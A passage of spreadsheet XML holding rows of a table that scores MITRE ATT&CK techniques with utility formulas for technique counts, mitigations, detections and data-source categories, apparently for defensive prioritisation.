        <v>0</v>
      </c>
      <c r="G615" s="37">
        <v>1</v>
      </c>
      <c r="H615" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I615" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J615" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K615" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L615" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M615" s="37">
        <v>0</v>
      </c>
      <c r="N615" s="56">
        <v>0</v>
      </c>
      <c r="O615" s="56">
        <v>0</v>
      </c>
      <c r="P615" s="56">
        <v>0</v>
      </c>
      <c r="Q615" s="56">
        <v>0</v>
      </c>
      <c r="R615" s="57"/>
      <c r="S615" s="57">
        <v>0</v>
      </c>
      <c r="T615" s="57"/>
      <c r="U615" s="57">
        <v>0</v>
      </c>
      <c r="V615" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W615" s="37">
        <v>0</v>
      </c>
      <c r="X615" s="37">
        <v>0</v>
      </c>
      <c r="Y615" s="37">
        <v>0</v>
      </c>
      <c r="Z615" s="37">
        <v>0</v>
      </c>
      <c r="AA615" s="37">
        <v>0</v>
      </c>
      <c r="AB615" s="37">
        <v>0</v>
      </c>
      <c r="AC615" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD615" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE615" s="37" t="str" cm="1">
        <f t="array" ref="AE615">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD615)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF615" s="37">
        <v>611</v>
      </c>
      <c r="AG615" s="37" t="str" cm="1">
        <f t="array" ref="AG615">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD615)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH615" s="37">
        <v>611</v>
      </c>
      <c r="AI615" s="37" t="str" cm="1">
        <f t="array" ref="AI615">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD615)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ615" s="37">
        <v>611</v>
      </c>
      <c r="AK615" s="37" t="str" cm="1">
        <f t="array" ref="AK615">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD615)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL615" s="37">
        <v>611</v>
      </c>
      <c r="AM615" s="37" t="str" cm="1">
        <f t="array" ref="AM615">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD615)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN615" s="37">
        <v>0</v>
      </c>
      <c r="AO615" s="37">
        <v>0</v>
      </c>
      <c r="AP615" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ615" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.75</v>
      </c>
      <c r="AR615" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS615" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT615" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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16" spans="1:47" ht="17">
      <c r="A616" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B616" s="37">
        <f t="shared" si="9"/>
        <v>122.45</v>
      </c>
      <c r="C616" s="37" t="s">
        <v>1993</v>
      </c>
      <c r="D616" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E616" s="37" t="s">
        <v>1994</v>
      </c>
      <c r="F616" s="37">
        <v>0</v>
      </c>
      <c r="G616" s="37">
        <v>1</v>
      </c>
      <c r="H616" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I616" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J616" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K616" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L616" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M616" s="37">
        <v>0</v>
      </c>
      <c r="N616" s="56">
        <v>0</v>
      </c>
      <c r="O616" s="56">
        <v>0</v>
      </c>
      <c r="P616" s="56">
        <v>0</v>
      </c>
      <c r="Q616" s="56">
        <v>0</v>
      </c>
      <c r="R616" s="57"/>
      <c r="S616" s="57">
        <v>0</v>
      </c>
      <c r="T616" s="57"/>
      <c r="U616" s="57">
        <v>0</v>
      </c>
      <c r="V616" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W616" s="37">
        <v>0</v>
      </c>
      <c r="X616" s="37">
        <v>0</v>
      </c>
      <c r="Y616" s="37">
        <v>0</v>
      </c>
      <c r="Z616" s="37">
        <v>0</v>
      </c>
      <c r="AA616" s="37">
        <v>0</v>
      </c>
      <c r="AB616" s="37">
        <v>0</v>
      </c>
      <c r="AC616" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD616" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE616" s="37" t="str" cm="1">
        <f t="array" ref="AE616">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD616)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF616" s="37">
        <v>612</v>
      </c>
      <c r="AG616" s="37" t="str" cm="1">
        <f t="array" ref="AG616">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD616)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH616" s="37">
        <v>612</v>
      </c>
      <c r="AI616" s="37" t="str" cm="1">
        <f t="array" ref="AI616">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD616)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ616" s="37">
        <v>612</v>
      </c>
      <c r="AK616" s="37" t="str" cm="1">
        <f t="array" ref="AK616">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD616)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL616" s="37">
        <v>612</v>
      </c>
      <c r="AM616" s="37" t="str" cm="1">
        <f t="array" ref="AM616">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD616)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN616" s="37">
        <v>0</v>
      </c>
      <c r="AO616" s="37">
        <v>0</v>
      </c>
      <c r="AP616" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ616" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.81666666666667</v>
      </c>
      <c r="AR616" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS616" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT616" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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17" spans="1:47" ht="17">
      <c r="A617" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B617" s="37">
        <f t="shared" si="9"/>
        <v>122.65</v>
      </c>
      <c r="C617" s="37" t="s">
        <v>1995</v>
      </c>
      <c r="D617" s="50" t="s">
        <v>1984</v>
      </c>
      <c r="E617" s="37" t="s">
        <v>1996</v>
      </c>
      <c r="F617" s="37">
        <v>0</v>
      </c>
      <c r="G617" s="37">
        <v>1</v>
      </c>
      <c r="H617" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I617" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J617" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K617" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L617" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M617" s="37">
        <v>0</v>
      </c>
      <c r="N617" s="56">
        <v>0</v>
      </c>
      <c r="O617" s="56">
        <v>0</v>
      </c>
      <c r="P617" s="56">
        <v>0</v>
      </c>
      <c r="Q617" s="56">
        <v>0</v>
      </c>
      <c r="R617" s="57"/>
      <c r="S617" s="57"/>
      <c r="T617" s="57"/>
      <c r="U617" s="57"/>
      <c r="V617" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W617" s="37">
        <v>0</v>
      </c>
      <c r="X617" s="37">
        <v>0</v>
      </c>
      <c r="Y617" s="37">
        <v>0</v>
      </c>
      <c r="Z617" s="37">
        <v>0</v>
      </c>
      <c r="AA617" s="37">
        <v>0</v>
      </c>
      <c r="AB617" s="37">
        <v>0</v>
      </c>
      <c r="AC617" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD617" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE617" s="37" t="str" cm="1">
        <f t="array" ref="AE617">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD617)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF617" s="37">
        <v>613</v>
      </c>
      <c r="AG617" s="37" t="str" cm="1">
        <f t="array" ref="AG617">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD617)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH617" s="37">
        <v>613</v>
      </c>
      <c r="AI617" s="37" t="str" cm="1">
        <f t="array" ref="AI617">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD617)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ617" s="37">
        <v>613</v>
      </c>
      <c r="AK617" s="37" t="str" cm="1">
        <f t="array" ref="AK617">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD617)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL617" s="37">
        <v>613</v>
      </c>
      <c r="AM617" s="37" t="str" cm="1">
        <f t="array" ref="AM617">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD617)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN617" s="37">
        <v>0</v>
      </c>
      <c r="AO617" s="37"/>
      <c r="AP617" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ617" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.883333333333333</v>
      </c>
      <c r="AR617" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS617" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT617" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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18" spans="1:47" ht="34">
      <c r="A618" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B618" s="37">
        <f t="shared" si="9"/>
        <v>257.40000000000003</v>
      </c>
      <c r="C618" s="37" t="s">
        <v>1997</v>
      </c>
      <c r="D618" s="50" t="s">
        <v>1998</v>
      </c>
      <c r="E618" s="37"/>
      <c r="F618" s="37">
        <v>1</v>
      </c>
      <c r="G618" s="37">
        <v>1</v>
      </c>
      <c r="H618" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I618" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J618" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K618" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L618" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M618" s="37">
        <v>0</v>
      </c>
      <c r="N618" s="56">
        <v>0</v>
      </c>
      <c r="O618" s="56">
        <v>0</v>
      </c>
      <c r="P618" s="56">
        <v>1</v>
      </c>
      <c r="Q618" s="56">
        <v>0</v>
      </c>
      <c r="R618" s="57"/>
      <c r="S618" s="57">
        <v>0</v>
      </c>
      <c r="T618" s="57" t="s">
        <v>1999</v>
      </c>
      <c r="U618" s="57">
        <v>0</v>
      </c>
      <c r="V618" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W618" s="37">
        <v>0</v>
      </c>
      <c r="X618" s="37">
        <v>0</v>
      </c>
      <c r="Y618" s="37">
        <v>0</v>
      </c>
      <c r="Z618" s="37">
        <v>1</v>
      </c>
      <c r="AA618" s="37">
        <v>0.01</v>
      </c>
      <c r="AB618" s="37">
        <v>0.01</v>
      </c>
      <c r="AC618" s="37"/>
      <c r="AD618" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE618" s="37" t="str" cm="1">
        <f t="array" ref="AE618">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD618)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF618" s="37">
        <v>614</v>
      </c>
      <c r="AG618" s="37" t="str" cm="1">
        <f t="array" ref="AG618">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD618)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH618" s="37">
        <v>614</v>
      </c>
      <c r="AI618" s="37" t="str" cm="1">
        <f t="array" ref="AI618">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD618)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ618" s="37">
        <v>614</v>
      </c>
      <c r="AK618" s="37" t="str" cm="1">
        <f t="array" ref="AK618">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD618)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL618" s="37">
        <v>614</v>
      </c>
      <c r="AM618" s="37" t="str" cm="1">
        <f t="array" ref="AM618">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD618)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN618" s="37">
        <v>0</v>
      </c>
      <c r="AO618" s="37">
        <v>0</v>
      </c>
      <c r="AP618" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ618" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>85.800000000000011</v>
      </c>
      <c r="AR618" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS618" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT618" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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19" spans="1:47" ht="51">
      <c r="A619" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B619" s="37">
        <f t="shared" si="9"/>
        <v>316.41428571428571</v>
      </c>
      <c r="C619" s="37" t="s">
        <v>2000</v>
      </c>
      <c r="D619" s="50" t="s">
        <v>2001</v>
      </c>
      <c r="E619" s="37"/>
      <c r="F619" s="37">
        <v>1</v>
      </c>
      <c r="G619" s="37">
        <v>1</v>
      </c>
      <c r="H619" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I619" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J619" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K619" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L619" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M619" s="37">
        <v>0</v>
      </c>
      <c r="N619" s="56">
        <v>0</v>
      </c>
      <c r="O619" s="56">
        <v>0</v>
      </c>
      <c r="P619" s="56">
        <v>6</v>
      </c>
      <c r="Q619" s="56">
        <v>0</v>
      </c>
      <c r="R619" s="57"/>
      <c r="S619" s="57">
        <v>0</v>
      </c>
      <c r="T619" s="57" t="s">
        <v>2002</v>
      </c>
      <c r="U619" s="57">
        <v>0</v>
      </c>
      <c r="V619" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W619" s="37">
        <v>0</v>
      </c>
      <c r="X619" s="37">
        <v>0</v>
      </c>
      <c r="Y619" s="37">
        <v>0</v>
      </c>
      <c r="Z619" s="37">
        <v>6</v>
      </c>
      <c r="AA619" s="37">
        <v>0.06</v>
      </c>
      <c r="AB619" s="37">
        <v>0.06</v>
      </c>
      <c r="AC619" s="37"/>
      <c r="AD619" s="50" t="s">
        <v>2003</v>
      </c>
      <c r="AE619" s="37" t="str" cm="1">
        <f t="array" ref="AE619">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD619)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF619" s="37">
        <v>615</v>
      </c>
      <c r="AG619" s="37" t="str" cm="1">
        <f t="array" ref="AG619">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD619)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH619" s="37">
        <v>615</v>
      </c>
      <c r="AI619" s="37" t="str" cm="1">
        <f t="array" ref="AI619">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD619)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ619" s="37">
        <v>615</v>
      </c>
      <c r="AK619" s="37" t="str" cm="1">
        <f t="array" ref="AK619">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD619)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL619" s="37">
        <v>615</v>
      </c>
      <c r="AM619" s="37" t="str" cm="1">
        <f t="array" ref="AM619">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD619)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN619" s="37">
        <v>0</v>
      </c>
      <c r="AO619" s="37">
        <v>0</v>
      </c>
      <c r="AP619" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ619" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>105.47142857142858</v>
      </c>
      <c r="AR619" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS619" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT619" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU61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20" spans="1:47" ht="51">
      <c r="A620" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B620" s="37">
        <f t="shared" si="9"/>
        <v>316.92857142857139</v>
      </c>
      <c r="C620" s="37" t="s">
        <v>2004</v>
      </c>
      <c r="D620" s="50" t="s">
        <v>2005</v>
      </c>
      <c r="E620" s="37"/>
      <c r="F620" s="37">
        <v>1</v>
      </c>
      <c r="G620" s="37">
        <v>1</v>
      </c>
      <c r="H620" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I620" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J620" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K620" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L620" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M620" s="37">
        <v>0</v>
      </c>
      <c r="N620" s="56">
        <v>0</v>
      </c>
      <c r="O620" s="56">
        <v>0</v>
      </c>
      <c r="P620" s="56">
        <v>6</v>
      </c>
      <c r="Q620" s="56">
        <v>0</v>
      </c>
      <c r="R620" s="57"/>
      <c r="S620" s="57">
        <v>0</v>
      </c>
      <c r="T620" s="57" t="s">
        <v>2006</v>
      </c>
      <c r="U620" s="57">
        <v>0</v>
      </c>
      <c r="V620" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W620" s="37">
